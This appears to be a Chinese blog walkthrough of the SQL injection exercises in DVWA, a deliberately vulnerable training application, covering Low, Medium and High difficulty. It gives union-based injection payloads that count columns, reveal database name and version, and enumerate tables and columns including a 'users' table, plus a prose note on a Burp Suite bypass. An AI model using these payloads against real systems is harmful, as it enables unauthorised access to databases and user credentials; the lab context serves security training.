DVWA 通关sql injection

1.LOW

看见页面有回显我们可以用联合查询的方法

1.判断列数

?id=1 order by 1

DVWA 通关sql injection_第1张图片

2.判断显示位置

?id=1' and 1=2 union select 1,2 --+

DVWA 通关sql injection_第2张图片

3.查看数据库中敏感信息

?id=1' and 1=2 union select database(),version() --+

DVWA 通关sql injection_第3张图片

4.查询数据库名

?id=1' and 1=2 union select database() --+

DVWA 通关sql injection_第4张图片

5.查询表名

?id=1' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() --+

DVWA 通关sql injection_第5张图片

6.查询字段名

?id=1' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database() --+

DVWA 通关sql injection_第6张图片

7.查询字段内容

DVWA 通关sql injection_第7张图片

二.Medium

1.判断是否为注入类型

数字型注入

DVWA 通关sql injection_第8张图片

2.判断列数

DVWA 通关sql injection_第9张图片

3.判断显示位。

DVWA 通关sql injection_第10张图片

4.查看数据库名

 

DVWA 通关sql injection_第11张图片

5.查询所有表名

id=2 and 1=2 union select 1,table_name from information_schema.tables where table_schema=database() --

DVWA 通关sql injection_第12张图片

6.查询表中字段名

id=2 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 #

DVWA 通关sql injection_第13张图片

7.获取字段内容

DVWA 通关sql injection_第14张图片

将DVWA的级别设置为High

将dvwa设置为高级,可以看出,点击”here to change your ID”,页面自动跳转,防御了自动化的SQL注入,分析源码可以看到,对参数没有做防御,在sql查询语句中限制了查询条数,可以通过burpsuit抓包,修改数据包实现绕过

你可能感兴趣的:(DVWA通过秘籍,渗透测试)